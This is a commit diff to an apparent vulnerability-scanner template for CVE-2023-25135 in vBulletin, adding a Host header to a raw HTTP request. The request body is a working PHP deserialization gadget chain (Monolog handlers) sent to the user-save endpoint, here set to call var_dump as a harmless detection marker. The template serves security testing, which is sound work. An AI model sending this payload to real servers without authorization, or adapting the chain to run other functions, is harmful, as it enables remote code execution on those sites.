Update CVE-2023-25135.yaml

2023-05-10 20:46:40 +05:30 · 2023-05-10 20:46:40 +05:30 · 34cbb997e0
parent 8de6c0cb81
commit 34cbb997e0
1 changed files with 1 additions and 0 deletions
--- a/http/cves/2023/CVE-2023-25135.yaml
+++ b/http/cves/2023/CVE-2023-25135.yaml
@ -27,6 +27,7 @@ http:
  - raw:
      - |
        POST /ajax/api/user/save HTTP/1.1
+        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        adminoptions=&options=&password={{randstr}}&securitytoken={{randstr}}&user%5Bemail%5D=pown%40pown.net&user%5Bpassword%5D=password&user%5Bsearchprefs%5D=a%3a2%3a{i%3a0%3bO%3a27%3a"googlelogin_vendor_autoload"%3a0%3a{}i%3a1%3bO%3a32%3a"Monolog\Handler\SyslogUdpHandler"%3a1%3a{s%3a9%3a"%00*%00socket"%3bO%3a29%3a"Monolog\Handler\BufferHandler"%3a7%3a{s%3a10%3a"%00*%00handler"%3br%3a4%3bs%3a13%3a"%00*%00bufferSize"%3bi%3a-1%3bs%3a9%3a"%00*%00buffer"%3ba%3a1%3a{i%3a0%3ba%3a2%3a{i%3a0%3bs%3a14%3a"CVE-2023-25135"%3bs%3a5%3a"level"%3bN%3b}}s%3a8%3a"%00*%00level"%3bN%3bs%3a14%3a"%00*%00initialized"%3bb%3a1%3bs%3a14%3a"%00*%00bufferLimit"%3bi%3a-1%3bs%3a13%3a"%00*%00processors"%3ba%3a2%3a{i%3a0%3bs%3a7%3a"current"%3bi%3a1%3bs%3a8%3a"var_dump"%3b}}}}&user%5Busername%5D={{randstr}}&userfield=&userid=0